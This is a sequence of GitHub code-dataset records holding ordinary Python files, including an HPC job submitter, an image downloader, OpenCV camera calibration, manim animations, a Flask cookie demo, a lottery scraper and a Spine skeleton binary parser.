filedata.replace( '##EXEC_DIR##', base_exec_dir + 'install-binq-bench/bin/coreneuron_exec' )\n\n if args.weak_scaling:\n filedata = filedata.replace( '##DUP_FAC##', '$((nthread_socket_0 + 1))' )\n else:\n filedata = filedata.replace( '##DUP_FAC##', str(int(max(nthreads))) )\n\n threads_loop_str = str()\n for nt in nthreads:\n threads_loop_str += str(int(nt-1)) + ' '\n filedata = filedata.replace( '##THREADS_LOOP##', threads_loop_str )\n\n with open( os.path.join( experiment_dir, 'submit.sh' ), 'w' ) as submit_f:\n submit_f.write( filedata )\n\n os.chdir( experiment_dir )\n for nt in nthreads:\n threads_result_dir = os.path.join( experiment_dir, str(nt) + 'n' )\n if not os.path.exists( threads_result_dir ):\n os.makedirs( threads_result_dir )\n subprocess.call( ['qsub', 'submit.sh'] )\n os.chdir( base_dir )\n\n if args.test:\n sys.exit(0)\n\n","repo_name":"RRZE-HPC/BBP-ECM-RA","sub_path":"app-bench/examples/submit_all.py","file_name":"submit_all.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20296256600","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@Project :deep-learning-tools \n@File :multi_download_pic.py\n@IDE :PyCharm \n@Author :hejintao\n@Date :2022/4/20 19:21 \n\"\"\"\nimport pandas as pd\nimport multiprocessing\nimport subprocess\n\nimport sys\nimport os\n\n\ninput_file = sys.argv[1]\noutput_dir = sys.argv[2]\n\n\nclass MyProcessCommand(multiprocessing.Process):\n def __init__(self, queue=None):\n super(MyProcessCommand, self).__init__()\n self.queue = queue\n\n def run(self):\n while True:\n url, cmsid, content = self.queue.get()\n\n try:\n # print(url)\n url_info_1, url_info_2 = url.split(\"/\")[-2:]\n tag = eval(content)['字幕是否裁剪']\n output_filename = cmsid + \"_\" + url_info_1 + \"_\" + url_info_2 + \".jpg\"\n # 裁剪图片储存为0,非裁剪的储存为1\n if tag == '是':\n output_filepath = os.path.join(output_dir, '0')\n elif tag == '否':\n output_filepath = os.path.join(output_dir, '1')\n else:\n pass\n output_filepath = os.path.join(output_filepath, output_filename)\n command = \"wget \" + url + \" -O \" + output_filepath\n\n # print(command)\n status, output = subprocess.getstatusoutput(command)\n except Exception as e:\n print(\"Exception: \", e)\n pass\n\n self.queue.task_done()\n\n\ndef command(command_list, num_processes=multiprocessing.cpu_count()):\n with multiprocessing.Manager() as manager:\n queue = multiprocessing.JoinableQueue()\n workerList = []\n for i in range(num_processes):\n worker = MyProcessCommand(queue=queue)\n workerList.append(worker)\n worker.daemon = True\n worker.start()\n\n for command in command_list:\n queue.put(command)\n\n queue.join()\n\n for worker in workerList:\n worker.terminate()\n\n print(\"Command Success!\")\n\n\ninput_data = pd.read_excel(input_file, header=0)\ninput_list = input_data.values.tolist()\n\ncommand(input_list)\n\n","repo_name":"hejt25/deep-learning-tools","sub_path":"multi_download_pic.py","file_name":"multi_download_pic.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41054230707","text":"import cv2\nimport glob\nimport numpy as np\n\n\ndef calibrate_camera(images):\n\n # Pixel coordinates\n points2D = []\n\n # coordinates of the checkerboard in checkerboard world space.\n points3D = []\n\n # checkerboard pattern detector criteria.\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n #number of rows and colums of the chessboard\n rows = 5\n cols = 8\n\n # square coordinates in real world space\n obj = np.zeros((rows * cols, 3), np.float32)\n obj[:, :2] = np.mgrid[0:rows, 0:cols].T.reshape(-1, 2)\n\n # frame size\n width = images[0].shape[1]\n height = images[0].shape[0]\n for frame in images:\n grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n success, corners = cv2.findChessboardCorners(grayFrame, (rows, cols), None)\n if success == True:\n # Convolution size for detecting corners\n conv_size = (11, 11)\n corners = cv2.cornerSubPix(grayFrame, corners, conv_size, (-1, -1), criteria)\n cv2.drawChessboardCorners(frame, (rows, cols), corners, success)\n #cv2.imshow('image', frame)\n cv2.waitKey(500)\n points2D.append(corners)\n points3D.append(obj)\n\n success, cameraMatrix, distCoefs, _, _ = cv2.calibrateCamera(points3D, points2D, (width, height), None, None)\n\n return cameraMatrix, distCoefs\n\n def stereo_calibrate(cameraMatrix1, distCoefs1, cameraMatrix2, distCoefs2, folderImages):\n\n image_names = glob.glob(folderImages)\n image_names = sorted(image_names)\n images_names1 = image_names[:len(image_names) // 2]\n images_names2 = image_names[len(image_names) // 2:]\n\n images_names1 = []\n images_names2 = []\n for img1, img2 in zip(images_names1, images_names2):\n _im = cv2.imread(img1, 1)\n images_names1.append(_im)\n\n _im = cv2.imread(img2, 1)\n images_names2.append(_im)\n\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.0001)\n\n # number of rows and colums of the chessboard\n rows = 5\n columns = 8\n\n # coordinates of squares in the checkerboard world space\n objp = np.zeros((rows * columns, 3), np.float32)\n objp[:, :2] = np.mgrid[0:rows, 0:columns].T.reshape(-1, 2)\n\n # frame dimensions. Frames should be the same size.\n width = images_names1[0].shape[1]\n height = images_names1[0].shape[0]\n\n # Pixel coordinates of checkerboards\n imgpoints_left = [] # 2d points in image plane.\n imgpoints_right = []\n\n # coordinates of the checkerboard in checkerboard world space.\n objpoints = [] # 3d point in real world space\n\n for frame1, frame2 in zip(images_names1, images_names2):\n gray1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\n gray2 = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)\n c_ret1, corners1 = cv2.findChessboardCorners(gray1, (5, 8), None)\n c_ret2, corners2 = cv2.findChessboardCorners(gray2, (5, 8), None)\n\n if c_ret1 == True and c_ret2 == True:\n corners1 = cv2.cornerSubPix(gray1, corners1, (11, 11), (-1, -1), criteria)\n corners2 = cv2.cornerSubPix(gray2, corners2, (11, 11), (-1, -1), criteria)\n\n cv2.drawChessboardCorners(frame1, (5, 8), corners1, c_ret1)\n cv2.imshow('img', frame1)\n\n cv2.drawChessboardCorners(frame2, (5, 8), corners2, c_ret2)\n cv2.imshow('img2', frame2)\n cv2.waitKey(500)\n\n objpoints.append(objp)\n imgpoints_left.append(corners1)\n imgpoints_right.append(corners2)\n\n stereocalibration_flags = cv2.CALIB_FIX_INTRINSIC\n success, CM1, dist1, CM2, dist2, R, T, E, F = cv2.stereoCalibrate(objpoints, imgpoints_left, imgpoints_right, cameraMatrix1,\n distCoefs1,\n cameraMatrix2, distCoefs2, (width, height), criteria=criteria,\n flags=stereocalibration_flags)\n\n\n return R, T\n\n# if __name__ == '__main__':\n#\n# imageFolder = ''\n # imagesNames = sorted(glob.glob(images_folder))\n # images = []x\n # for name in images_names:\n # image = cv2.imread(name, 1)\n # images.append(image)\n #calibrate_camera(images)","repo_name":"lfranschman/HoloNav-Grayscale-triangulation","sub_path":"pyapp/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27791785484","text":"\"\"\"\n\nincomplete\n\"\"\"\n\ndef solution(students: list, sandwiches: list) -> int:\n fed_students = 0\n\n while students:\n past_length = len(students)\n new_queue = []\n for i, student in enumerate(students):\n if student != sandwiches[0]:\n new_queue.append(student)\n else:\n students = students[:i] + students[i+1:]\n sandwiches = sandwiches[1:]\n if not sandwiches:\n return fed_students\n fed_students += 1\n if len(new_queue) == past_length:\n return fed_students\n return fed_students\n\n","repo_name":"joeskang/technical-interview-prep","sub_path":"LeetCode/neetcode-course/1700 Number of Students Unable to Eat Lunch.py","file_name":"1700 Number of Students Unable to Eat Lunch.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70078532415","text":"import scripter\nimport pyautogui\n\ni = 1\nPAUSE_MS = 1\npyautogui.PAUSE = PAUSE_MS / 1000\n\ndef foo():\n # buy pot\n # print(pyautogui.position())\n pyautogui.moveTo(330, 230)\n pyautogui.keyDown('shift')\n pyautogui.click()\n\n global i\n print(i)\n i= i + 1\n\nscripter.run(foo)","repo_name":"desmondw/scripts","sub_path":"torchlight/buy_pots.py","file_name":"buy_pots.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7524155503","text":"import numpy as np\r\n\r\nA = np.array([[1, 2], [3, 4]])\r\n\r\nquant = A.size\r\nlin, col = A.shape\r\n\r\nfor i in range(lin):\r\n for j in range(col):\r\n if A[i][j] < 2:\r\n print(A[i][j])\r\n\r\n","repo_name":"douglasrodriguess/basic-to-advanced-python-course","sub_path":"07-collections/exercise/part2/Exercise01loop.py","file_name":"Exercise01loop.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73214603776","text":"from manimlib.animation.animation import Animation\nfrom manimlib.constants import *\nfrom manimlib.utils.config_ops import digest_config\n\n\nclass Homotopy(Animation):\n CONFIG = {\n \"run_time\": 3,\n \"apply_function_kwargs\": {},\n }\n\n def __init__(self, homotopy, mobject, **kwargs):\n \"\"\"\n Homotopy a function from (x, y, z, t) to (x', y', z')\n \"\"\"\n def function_at_time_t(t):\n return lambda p: homotopy(p[0], p[1], p[2], t)\n self.function_at_time_t = function_at_time_t\n digest_config(self, kwargs)\n Animation.__init__(self, mobject, **kwargs)\n\n def update_submobject(self, submob, start, alpha):\n submob.points = start.points\n submob.apply_function(\n self.function_at_time_t(alpha),\n **self.apply_function_kwargs\n )\n\n\nclass SmoothedVectorizedHomotopy(Homotopy):\n def update_submobject(self, submob, start, alpha):\n Homotopy.update_submobject(self, submob, start, alpha)\n submob.make_smooth()\n\n\nclass ComplexHomotopy(Homotopy):\n def __init__(self, complex_homotopy, mobject, **kwargs):\n \"\"\"\n Complex Hootopy a function Cx[0, 1] to C\n \"\"\"\n def homotopy(x, y, z, t):\n c = complex_homotopy(complex(x, y), t)\n return (c.real, c.imag, z)\n Homotopy.__init__(self, homotopy, mobject, **kwargs)\n\n\nclass PhaseFlow(Animation):\n CONFIG = {\n \"virtual_time\": 1,\n \"rate_func\": None,\n }\n\n def __init__(self, function, mobject, **kwargs):\n digest_config(self, kwargs, locals())\n Animation.__init__(self, mobject, **kwargs)\n\n def update_mobject(self, alpha):\n if hasattr(self, \"last_alpha\"):\n dt = self.virtual_time * (alpha - self.last_alpha)\n self.mobject.apply_function(\n lambda p: p + dt * self.function(p)\n )\n self.last_alpha = alpha\n\n\nclass MoveAlongPath(Animation):\n def __init__(self, mobject, path, **kwargs):\n digest_config(self, kwargs, locals())\n Animation.__init__(self, mobject, **kwargs)\n\n def update_mobject(self, alpha):\n point = self.path.point_from_proportion(alpha)\n self.mobject.move_to(point)\n","repo_name":"lkevinzc/manim-tut","sub_path":"manimlib/animation/movement.py","file_name":"movement.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"22467312633","text":"# Juego de preguntas\ndef check_guess(guess, answer):\n global score # Es una variable local y lo convertimos a global\n still_gressing = True\n attempt = 0\n while still_gressing and attempt < 3:\n if guess.lower() == answer.lower():\n print('Respuesta correcta')\n score += 1\n still_gressing = False\n else:\n if attempt < 2:\n guess = input('Respuesta equivocada, trata de nuevo')\n attempt += 1\n if attempt == 3:\n print('La respuesta correcta es: ',answer)\nscore = 0\nprint('Adivina el animal')\nguess1= input('¿Que oso vive en el polo norte?')\ncheck_guess(guess1, 'Oso polar')\nguess2= input('¿Cual es el animal mas rapido de la tierra?')\ncheck_guess(guess2, 'Leopardo')\nguess3= input('¿Cual es el animal mas grande?')\ncheck_guess(guess3, 'Ballena azul')\nprint('Tu resultado es: ' + str(score))","repo_name":"CosterBellido/Python-principiantes","sub_path":"Juego de preguntas.py","file_name":"Juego de preguntas.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33512180867","text":"import requests\nfrom fake_useragent import UserAgent\nfrom lxml import etree\nimport pymysql\n# 彩票数据所在的url\nurl = \"https://datachart.500.com/ssq/\"\n# 提取数据\nresponse = requests.get(url, headers={'UserAgent': UserAgent().chrome})\n# 通过xpath去解析\ne = etree.HTML(response.text)\ndata_times = e.xpath('//tbody[@id=\"tdata\"]/tr/td[1]/text()')\ntrs = e.xpath('//tbody[@id=\"tdata\"]/tr[not(@class)]')\n# 链接数据库\nclient = pymysql.connect(host='localhost', port=3306, user='root', password='lsb19981220', db='ball')\ncursor = client.cursor()\n# 插入数据的sql\nsql = 'insert into t_ball values(0, %s, %s, %s)'\n# 查看数据是否存在\nselect_new_sql = \"select * from t_ball where data_time = %s\"\ndata_times.reverse()\n# 记录有多少条新数据\nindex = 0\n\nfor data_time in data_times:\n result = cursor.execute(select_new_sql, [data_time])\n if result == 1:\n break\n index += 1\nprint(index)\ntrs.reverse()\n\n\nfor data_time, tr in zip(data_times, trs):\n\n red_ball = '-'.join(tr.xpath('./td[@class=\"chartBall01\"]/text()'))\n blue_ball = tr.xpath('./td[@class=\"chartBall02\"]/text()')[0]\n print('第 ' + data_time + '期: 红球是:' + red_ball + '蓝球:' + blue_ball)\n cursor.execute(sql, [data_time, red_ball, blue_ball])\n client.commit()\ncursor.close()\nclient.close()","repo_name":"lsb567/Python_Reptile","sub_path":"day06/doubleballs.py","file_name":"doubleballs.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22628491888","text":"# -*- coding: utf-8 -*-#\nfrom flask import Flask, request, Response\nfrom datetime import datetime\nfrom subViews import bp\napp = Flask(__name__)\napp.register_blueprint(bp)\napp.config[\"SERVER_NAME\"] = \"test.com:5000\"\n\n\n@app.route('/')\ndef hello_world():\n resp = Response(\"Hello World!\")\n # max_age 以秒为单位,距离现在多少秒后过期\n # resp.set_cookie(key=\"username\", value=\"xingchen\", max_age=100)\n # expires datetime类型 设置的��间是Greenwich Mean Time(格林威治时间/格林尼治时间)\n # 格林威治时间 + 8小时 = 东八区时间\n # expires虽然在http协议是被废弃了,但是到目前为止,所有的浏览器还是都支持\n # max_age在IE8以下的浏览器是不支持的\n expires = datetime(year=2019, month=8, day=22, hour=9, minute=14, second=20)\n # resp.set_cookie(key=\"username\", value=\"xingchen\", expires=expires)\n # 若max_age和expires都指定,则默认使用max_age参数的值\n resp.set_cookie(key=\"username\", value=\"xingchen\", max_age=600, expires=expires, domain=\".test.com\")\n return resp\n\n\n@app.route('/del/')\ndef delCookie():\n resp = Response(\"删除cookie\")\n resp.delete_cookie(key=\"username\")\n return resp\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"ZhouRuiXiang/Flask_Note","sub_path":"Cookie_Session/flask_cookie_session/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2595228078","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import (division, print_function, unicode_literals,\n absolute_import)\n\nfrom .tag_caracter import TagCaracter\n\n\nclass TagBoolean(TagCaracter):\n def __init__(self, *args, **kwargs):\n self.valores_texto = {\n None: '',\n True: 'true',\n False: 'false',\n }\n super(TagBoolean, self).__init__(*args, **kwargs)\n self.valor = None\n\n @property\n def valor(self):\n return self._valor\n\n @valor.setter\n def valor(self, valor):\n if isinstance(valor, str):\n self.valor = valor.decode('utf-8')\n\n elif isinstance(valor, unicode):\n if valor.lower() == 'true':\n self.valor = True\n elif valor.lower() == 'false':\n self.valor = False\n else:\n self.valor = None\n\n elif isinstance(valor, bool):\n self._valor = valor\n if self.valor:\n self._texto = 'true'\n else:\n self._texto = 'false'\n\n elif valor is None:\n self._valor = None\n\n self._texto = self.valores_texto[self.valor]\n","repo_name":"danimaribeiro/odoo-erp","sub_path":"server/pybrasil/xml/tag_boolean.py","file_name":"tag_boolean.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21345625675","text":"import json\nimport struct\nfrom io import BytesIO\nfrom typing import BinaryIO\nimport pprint\nimport ctypes\n\n\ndef int_overflow(val):\n maxint = 2147483647\n if not -maxint - 1 <= val <= maxint:\n val = (val + (maxint + 1)) % (2 * (maxint + 1)) - maxint - 1\n return val\n\n\ndef unsigned_right_shitf(n, i):\n if n < 0:\n n = ctypes.c_uint32(n).value\n if i < 0:\n return -int_overflow(n << abs(i))\n # print(n)\n return int_overflow(n >> i)\n\n\nBLEND_MODE = ['normal', 'additive', 'multiply', 'screen']\nATTACHMENT_TYPE = ['region', 'boundingbox', 'mesh', 'weightedmesh', 'linkedmesh', 'weightedlinkedmesh']\n\nTIMELINE_TYPE = ['rotate', 'translate', 'scale', 'shear', 'attachment', 'color']\n\nCURVE_TYPE = ['linear', 'stepped', 'bezier']\n\n\nclass Handler():\n def __init__(self, f: BinaryIO, for_new=True):\n self.f = f\n self.nonessential = False\n self._result = dict()\n self._skin_index = list()\n self.for_new = for_new\n\n def read(self, l=1):\n b = self.f.read(l)\n return b[0] if l == 1 else b\n\n def read_var_int(this, optimizePositive):\n b = this.read()\n result = b & 127\n if ((b & 128) != 0):\n b = this.read()\n result |= (b & 127) << 7\n if ((b & 128) != 0):\n b = this.read()\n result |= (b & 127) << 14\n if ((b & 128) != 0):\n b = this.read()\n result |= (b & 127) << 21\n if ((b & 128) != 0):\n b = this.read()\n result |= (b & 127) << 28\n # return optimizePositive ? result : result >>> 1 ^ -(result & 1);\n # return result if optimizePositive else ((-1 & (2**32-1)) >> 1) ^ -(result & 1)\n return int_overflow(result) if optimizePositive else unsigned_right_shitf(result, 1) ^ -(result & 1)\n\n def read_string(self):\n char_count = self.read_var_int(True)\n if char_count == 0: return None\n if char_count == 1: return ''\n if char_count == 2: return chr(self.read())\n return self.read(char_count - 1).decode('utf8') # readUtf8_slow\n\n def handle_skeleton(self):\n result = {'hash': self.read_string(),\n 'spine': self.read_string(),\n 'width': self.read_float(),\n 'height': self.read_float()}\n self.nonessential = self.read_bool()\n # print(self.nonessential)\n result['images'] = self.read_string() if self.nonessential else None\n return result\n\n def handle_bones(self):\n result = []\n bones_count = self.read_var_int(True)\n # print(bones_count)\n for i in range(bones_count):\n # print(i, '/', bones_count)\n r = {\n 'name': self.read_string(),\n 'parent': result[self.read_var_int(True)]['name'] if i != 0 else None,\n 'rotation': self.read_float(),\n 'x': self.read_float(),\n 'y': self.read_float(),\n 'scaleX': self.read_float(),\n 'scaleY': self.read_float(),\n 'shearX': self.read_float(),\n 'shearY': self.read_float(),\n 'length': self.read_float(),\n 'inheritRotation': self.read_bool(),\n 'inheritScale': self.read_bool(),\n }\n if self.nonessential: r['color'] = self.read_rgba8888()\n if self.for_new:\n # transform: Determines how parent bone transforms are inherited:\n # normal, onlyTranslation, noRotationOrReflection, noScale, or noScaleOrReflection.\n # Assume normal if omitted.\n # print((r['name'], r['inheritRotation'], r['inheritScale']))\n r['transform'] = {(True, True): 'normal',\n (True, False): 'noScale',\n (False, True): 'noRotationOrReflection',\n (False, False): 'onlyTranslation'}.get((r['inheritRotation'], r['inheritScale']),\n 'normal')\n result.append(r)\n return result\n\n def rvit(self):\n return self.read_var_int(True)\n\n def get_bone_name(self, index):\n return self._result['bones'][index]['name']\n\n def get_slot_name(self, index):\n return self._result['slots'][index]['name']\n\n def handle_ik(self):\n result = []\n for i in range(self.rvit()):\n result.append({\n 'name': self.read_string(),\n 'bones': [self.get_bone_name(self.rvit()) for i in range(self.rvit())],\n 'target': self.get_bone_name(self.rvit()),\n 'mix': self.read_float(),\n 'bendPositive': (self.read_byte() == 1),\n # for_new: Constraint order can be specified after `3.5.00-beta`\n # The default value is `0`, which means if the value is lost, only first IK Constraint will work.\n 'order': i # data.order = this.getValue(constraintMap, \"order\", 0);\n })\n return result\n\n def handle_transform(self):\n result = []\n for i in range(self.rvit()):\n d = {\n 'name': self.read_string(),\n 'bone': self.get_bone_name(self.rvit()),\n 'target': self.get_bone_name(self.rvit()),\n 'rotation': self.read_float(),\n 'x': self.read_float(),\n 'y': self.read_float(),\n 'scaleX': self.read_float(),\n 'scaleY': self.read_float(),\n 'shearY': self.read_float(),\n 'rotateMix': self.read_float(),\n 'translateMix': self.read_float(),\n 'scaleMix': self.read_float(),\n 'shearMix': self.read_float(),\n 'order': i # same to ik order\n }\n # for (JsonValue boneMap = constraintMap.getChild(\"bones\"); boneMap != null; boneMap = boneMap.next) {\n if self.for_new:\n d['bones'] = [d.pop('bone')]\n result.append(d)\n return result\n\n def handle_slots(self):\n result = []\n slots_count = self.rvit()\n # print(slots_count)\n for i in range(slots_count):\n # print(i)\n d = {\n 'name': self.read_string(),\n 'bone': self.get_bone_name(self.rvit()),\n 'color': self.read_rgba8888(), }\n a = self.read_string()\n if a: d.update({'attachment': a})\n d.update({\n 'blend': BLEND_MODE[self.rvit()]\n })\n result.append(d)\n return result\n\n def read_float_array(self, length):\n return [self.read_float() for i in range(length)]\n\n def read_short(self):\n return struct.unpack('>h', self.read(2))[0]\n\n def read_short_array(self):\n return [self.read_short() for i in range(self.rvit())]\n\n def read_skin(self):\n slot_count = self.rvit()\n if slot_count == 0: return None\n skin_result = dict() # ['slotName']\n for i in range(slot_count):\n slot_result = dict() # ['attachmentName']\n slot_index = self.rvit()\n for ii in range(self.rvit()): # attachment count\n placeholder_name = self.read_string()\n name = self.read_string()\n if not name: name = placeholder_name\n type = ATTACHMENT_TYPE[self.read()]\n d = {\n 'name': name,\n 'type': type\n }\n if type == 'region':\n d.update({\n 'path': self.read_string(),\n 'rotation': self.read_float(),\n 'x': self.read_float(),\n 'y': self.read_float(),\n 'scaleX': self.read_float(),\n 'scaleY': self.read_float(),\n 'width': self.read_float(),\n 'height': self.read_float(),\n 'color': self.read_rgba8888(), # ?\n })\n elif type == 'boundingbox':\n d.update({\n 'vertices': self.read_float_array(self.rvit() * 2),\n # 'color': self.read_rgba8888(),\n })\n elif type == 'mesh':\n d.update({\n 'path': self.read_string(),\n 'color': self.read_rgba8888(), })\n vertices_length = self.rvit() * 2\n d.update({\n 'uvs': self.read_float_array(vertices_length),\n 'triangles': self.read_short_array(),\n 'vertices': self.read_float_array(vertices_length),\n 'hull': self.rvit()})\n\n if self.nonessential:\n d.update({\n 'edges': self.read_short_array(),\n 'width': self.read_float(),\n 'height': self.read_float(),\n })\n elif type in ['linkedmesh', 'weightedlinkedmesh']:\n # print(type)\n if type == 'weightedlinkedmesh' and self.for_new:\n d.update({'type': 'linkedmesh'})\n d.update({\n 'path': self.read_string(),\n 'color': self.read_rgba8888(),\n 'skin': self.read_string(),\n 'parent': self.read_string(),\n 'deform': self.read_bool(), # inheritFFD\n })\n if self.nonessential:\n d.update({\n 'width': self.read_float(),\n 'height': self.read_float()\n })\n elif type == 'weightedmesh':\n if type == 'weightedmesh' and self.for_new:\n d.update({'type': 'mesh'})\n d.update({\n 'path': self.read_string(),\n 'color': self.read_rgba8888(), })\n vertex_count = self.rvit()\n d.update({\n 'uvs': self.read_float_array(vertex_count * 2),\n 'triangles': self.read_short_array(), })\n # complex here\n # vertices = [(bone_count,(float*4)*bone_count))*vertex_count]\n vertices = []\n for i in range(vertex_count):\n bone_count = self.read_float()\n vertices.append(bone_count)\n for ii in range(int(bone_count)):\n vertices += self.read_float_array(4)\n\n d.update({'vertices': vertices,\n 'hull': self.rvit()\n })\n if self.nonessential:\n d.update({\n 'edges': self.read_short_array(),\n 'width': self.read_float(),\n 'height': self.read_float(),\n })\n # js null\n if d.get('path') is None:\n # print('get: ',d['path'])\n d.pop('path')\n\n slot_result[placeholder_name] = d\n skin_result[self.get_slot_name(slot_index)] = slot_result\n return skin_result\n\n def handle_skins(self):\n result = dict()\n result['default'] = self.read_skin()\n self._skin_index.append('default')\n for i in range(self.rvit()):\n skin_name = self.read_string()\n self._skin_index.append(skin_name)\n result[skin_name] = self.read_skin()\n return result\n\n def handle_events(self):\n result = []\n for i in range(self.rvit()):\n result.append({\n 'name': self.read_string(),\n 'int': self.read_var_int(False),\n 'float': self.read_float(),\n 'string': self.read_string()\n })\n return result\n\n def handle_animations(self):\n result = dict()\n for i in range(self.rvit()):\n name = self.read_string()\n animation = {\n 'slots': dict(),\n 'bones': dict(),\n 'ik': dict(),\n 'transform': dict(),\n 'ffd': dict(),\n # 'draworder': dict(),\n # 'events': dict(),\n }\n # readAnimation\n\n # slot timelines\n for i in range(self.rvit()):\n slot_index = self.rvit()\n slot_name = self.get_slot_name(slot_index)\n animation['slots'][slot_name] = dict()\n for ii in range(self.rvit()):\n timeline_type = TIMELINE_TYPE[self.read()]\n frame_count = self.rvit()\n timeline_data = []\n if timeline_type == 'color':\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'color': self.read_rgba8888(),\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n\n timeline_data.append(d)\n elif timeline_type == 'attachment':\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'name': self.read_string()\n }\n timeline_data.append(d)\n else:\n raise NotImplementedError\n animation['slots'][slot_name][timeline_type] = timeline_data\n\n # bone timelines\n for i in range(self.rvit()):\n bone_index = self.rvit()\n bone_name = self.get_bone_name(bone_index)\n animation['bones'][bone_name] = dict()\n for ii in range(self.rvit()):\n timeline_type = TIMELINE_TYPE[self.read()]\n frame_count = self.rvit()\n timeline_data = []\n if timeline_type == 'rotate':\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'angle': self.read_float()\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n elif timeline_type in ['translate', 'scale', 'shear']:\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'x': self.read_float(),\n 'y': self.read_float()\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n else:\n raise NotImplementedError\n animation['bones'][bone_name][timeline_type] = timeline_data\n\n # ik timelines\n for i in range(self.rvit()):\n ik_index = self.rvit()\n ik_constraint_name = self._result['ik'][ik_index]['name']\n frame_count = self.rvit()\n timeline_data = []\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'mix': self.read_float(),\n 'bendPositive': (self.read_byte() == 1)\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n animation['ik'][ik_constraint_name] = timeline_data\n\n # transform\n for i in range(self.rvit()):\n transform_index = self.rvit()\n transform_constraint_name = self._result['transform'][transform_index]['name']\n frame_count = self.rvit()\n timeline_data = []\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'rotateMix': self.read_float(),\n 'translateMix': self.read_float(),\n 'scaleMix': self.read_float(),\n 'shearMix': self.read_float()\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n animation['transform'][transform_constraint_name] = timeline_data\n\n # FFD\n for i in range(self.rvit()):\n skin_index = self.rvit()\n skin_name = self._skin_index[skin_index]\n skin_data = dict()\n for ii in range(self.rvit()):\n slot_index = self.rvit()\n slot_name = self.get_slot_name(slot_index)\n slot_data = dict()\n for iii in range(self.rvit()):\n attachment_name = self.read_string()\n frame_count = self.rvit()\n timeline_data = []\n\n for fi in range(frame_count):\n d = {\n 'time': self.read_float()\n }\n\n v_end = self.rvit()\n\n if v_end != 0:\n vertices = []\n v_start = self.rvit()\n # Java\n # end += start;\n # for (int v = start; v < end; v++) // len = end\n for _ in range(v_end):\n vertices.append(self.read_float())\n d.update({\n 'offset': v_start,\n 'vertices': vertices\n })\n\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n slot_data[attachment_name] = timeline_data\n skin_data[slot_name] = slot_data\n animation['ffd'][skin_name] = skin_data\n\n # draworder\n draworder = []\n for i in range(self.rvit()):\n d = {\n 'time': self.read_float(),\n }\n offset_count = self.rvit()\n offsets = []\n for ii in range(offset_count):\n offsets.append({\n 'slot': self.get_slot_name(self.rvit()),\n 'offset': self.rvit()\n })\n d.update({\n 'offsets': offsets\n })\n draworder.append(d)\n if draworder: animation['draworder'] = draworder\n\n # event\n events = []\n for i in range(self.rvit()):\n d = {\n 'time': self.read_float(), }\n event_index = self.rvit() # eventData\n d.update({\n 'int': self.read_var_int(False),\n 'name': self._result['events'][event_index]['name'],\n 'float': self.read_float(),\n 'string': self.read_string() if self.read_bool()\n else self._result['events'][event_index]['string']\n })\n events.append(d)\n if events: # readAnimation error\n animation['events'] = events\n\n # check new (ffd->deform)\n if self.for_new:\n animation['deform'] = animation.pop('ffd')\n\n # add single animation data\n result[name] = animation\n # print(animation)\n\n return result\n\n def read_curve(self):\n curve_type = CURVE_TYPE[self.read()]\n if curve_type == 'stepped':\n return 'stepped'\n elif curve_type == 'bezier':\n return [self.read_float() for i in range(4)]\n\n def handle(self):\n self.f.seek(0)\n self._result = dict()\n self._result['skeleton'] = self.handle_skeleton()\n self._result['bones'] = self.handle_bones()\n self._result['ik'] = self.handle_ik()\n self._result['transform'] = self.handle_transform()\n self._result['slots'] = self.handle_slots()\n self._result['skins'] = self.handle_skins()\n self._result['events'] = self.handle_events()\n self._result['animations'] = self.handle_animations()\n return self._result\n\n def read_float(self):\n return struct.unpack('>f', self.read(4))[0]\n\n 